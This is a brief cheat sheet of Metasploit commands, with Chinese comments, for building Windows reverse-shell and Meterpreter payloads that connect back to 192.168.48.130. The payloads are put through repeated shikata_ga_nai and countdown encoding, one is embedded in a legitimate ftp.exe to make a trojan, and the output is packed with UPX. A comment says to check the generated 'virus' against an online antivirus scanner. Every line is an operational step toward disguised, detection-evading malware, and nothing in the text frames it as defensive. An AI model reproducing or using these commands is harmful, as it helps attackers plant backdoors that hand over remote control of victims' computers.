#msfpayload windows/shell/reverse_tcp LHOST=192.168.48.130 LPORT=1111 R | msfencode -e x86/shikata_ga_nai -t exe>123.exe
//世界杀毒网监测一下生成的病毒 www.virus.org
#msfencode -l
//查看不同的编码
#msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.48.130 LPORT=1111 R |msfencode -e x86/shikata_ga_nai -c 10 -t raw | msfencode -e x86/countdown -c 5 -t exe -o /1231.exe
#msfencode windows/shell/reverse_tcp LHOST=192.168.48.130 LPORT=1111 R | msfencode -t exe -x /root/ftp.exe -o 123123.exe -e x86/shikata_ga_nai -k -c 10
#upx -5 /1231.exe
//加壳